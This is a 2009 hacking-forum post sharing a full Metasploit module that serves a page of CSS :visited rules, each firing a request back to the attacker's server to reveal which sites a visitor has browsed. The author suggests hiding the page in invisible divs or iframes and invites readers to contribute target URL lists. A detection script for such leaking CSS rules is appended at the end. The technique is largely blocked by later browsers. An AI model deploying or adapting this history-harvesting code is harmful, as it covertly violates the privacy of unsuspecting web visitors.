Saint_Patrick (Script Kiddie)
Joined: 03 Apr 2005  Posts: 135  Location: Drifting
Posted: Sun Feb 01, 2009 3:33 am  Post subject: Stealing Browser History - New Metasploit Module
So, if you don't follow my tweets or blog, you might be interested in a new metasploit module that I've written for stealing browser history as PoC'd by RSnake.
There are a couple of ways to perform this sort of recon. However, we are interested in an approach that does not utilize scripting.
Code:

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  #
  # This module acts as an HTTP server
  #
  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Browser History Harvester',
      'Description' => %q{
        This module creates a page containing CSS and HTML which will trigger GET requests
        based on visited sites. This allows an attacker to obtain browser history information
        without the use of scripting.
      },
      'License'     => MSF_LICENSE,
      'Author'      =>
        [
          'Saint Patrick <saintpatrick@l1pht.com>'
        ],
      'Version'     => '$Revision: 10 $',
      'References'  =>
        [
          ['URL', 'http://ha.ckers.org/blog/20070228/steal-browser-history-without-javascript/']
        ]
    ))

    register_options(
      [
        OptPath.new('SITELIST', [ false, "The list of URLs that visits will be checked on",
          File.join(Msf::Config.install_root, "data", "exploits", "capture", "http", "sites.txt")
        ])
      ], self.class)
  end

  def on_request_uri(cli, request)
    tokenize = request.uri.split('?')

    # A request carrying a query string is a :visited callback naming a site;
    # a bare request is the browser asking for the page itself.
    if (tokenize.length > 1)
      tokenize[1].chomp!('=')
      print_status("#{cli.peerhost} visited: #{tokenize[1]}")
      # Answer with a real 404 so the browser does not hang waiting on the "image"
      # (send_response would have returned a 200 with the status line as its body)
      send_not_found(cli)
    else
      print_status("Request '#{request.uri}' from #{cli.peerhost}:#{cli.peerport}")
      resp = build_page
      send_response(cli, resp)
      print_status("Sent page to #{cli.peerhost}")
    end
  end

  def build_page
    # get_resource resolves to URIPATH when set, or to the randomly chosen
    # resource path otherwise, so the callback always lands on this handler
    callback = get_resource.chomp('/')

    page = %Q^<html>
<style>^

    # One :visited rule per candidate site; the background fetch is the callback
    @sites.each_with_index do |site, idx|
      page << "a:visited#link#{idx}\n"
      page << "{background:url('#{callback}?#{site}');}\n"
    end
    page << "</style>\n"

    # The matching anchors, one per rule, so the browser has something to style
    @sites.each_with_index do |site, idx|
      page << "<a id=\"link#{idx}\" href=\"http://#{site}\">#{site}</a><br/>\n"
    end
    page << "</html>"

    return page
  end

  # Initialize all things holy
  def run
    @sitelist = datastore['SITELIST']

    # Read here and use as gospel from here on out: strip whitespace,
    # drop blank lines and '#' comments once instead of on every request
    @sites = File.readlines(@sitelist).map(&:strip).reject do |site|
      site.empty? || site.start_with?('#')
    end

    exploit()
  end
end
As you can see, we are basically creating a unique CSS style for every link. Each time a 'visited' fires, it makes a GET back to our metasploit server, where we handle/parse the value and throw it in the console. After which, we throw back a 404 (sending a response keeps the browser from hanging and keeping info from us).
Of course you could stealth this up a bit by <div>'ing and styling to hidden, or <iframe>'ing and squeezing the area down. But I leave that up to you.
Interesting side effect: if your attack page is loaded in a tab of Firefox, and you visit one of the guessed URLs in another tab, it will fire the style and metasploit will register the visit in real time. I'm assuming this is because FF re-renders styles after any request? IE, not so much.
If you build interesting URL lists, please post them.
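An added example of mine, not code from the post or from Metasploit: a small Ruby scanner that pulls the inline CSS out of an HTML page and flags every :visited rule whose declarations load a URL, which is exactly the shape of page the module above generates. The sample HTML is constructed and the property list is my own choice of URL-bearing properties.

```ruby
# Scanner for CSS rules that can leak :visited state to a remote server.
# Constructed sample page, shaped like the output of the module above.
SAMPLE_HTML = <<~HTML
  <html>
  <style>
  a:visited#link0
  {background:url('/harvest?example.com');}
  a:visited#link1
  {background:url('/harvest?example.org');}
  a:link { color: blue; }
  a:visited { color: purple; }
  </style>
  <a id="link0" href="http://example.com">example.com</a><br/>
  </html>
HTML

# Properties whose value can name a URL and therefore trigger a network fetch
# (assumed list; colour-only properties such as 'color' are harmless here).
URL_PROPERTIES = %w[background background-image content list-style
                    list-style-image border-image cursor].freeze

LeakRule = Struct.new(:selector, :property, :url)

# Returns every rule whose selector uses :visited and whose body loads a URL.
def find_visited_leaks(css)
  leaks = []
  css.scan(/([^{}]+)\{([^}]*)\}/m) do |selector, body|
    selector = selector.strip
    next unless selector.include?(':visited')
    body.split(';').each do |decl|
      prop, _, value = decl.partition(':')
      prop = prop.strip.downcase
      next unless URL_PROPERTIES.include?(prop)
      value.scan(/url\(\s*['"]?([^'")]+)['"]?\s*\)/i) do |(url)|
        leaks << LeakRule.new(selector, prop, url)
      end
    end
  end
  leaks
end

# Extracts each <style> block from an HTML document and scans it.
def scan_html(html)
  html.scan(%r{<style[^>]*>(.*?)</style>}mi).flat_map { |(css)| find_visited_leaks(css) }
end

if __FILE__ == $0
  scan_html(SAMPLE_HTML).each { |l| puts "#{l.selector} -> #{l.property}: #{l.url}" }
end
```

A plain `a:visited { color: purple; }` is not reported, which is the distinction later browsers enforced by restricting :visited to colour changes.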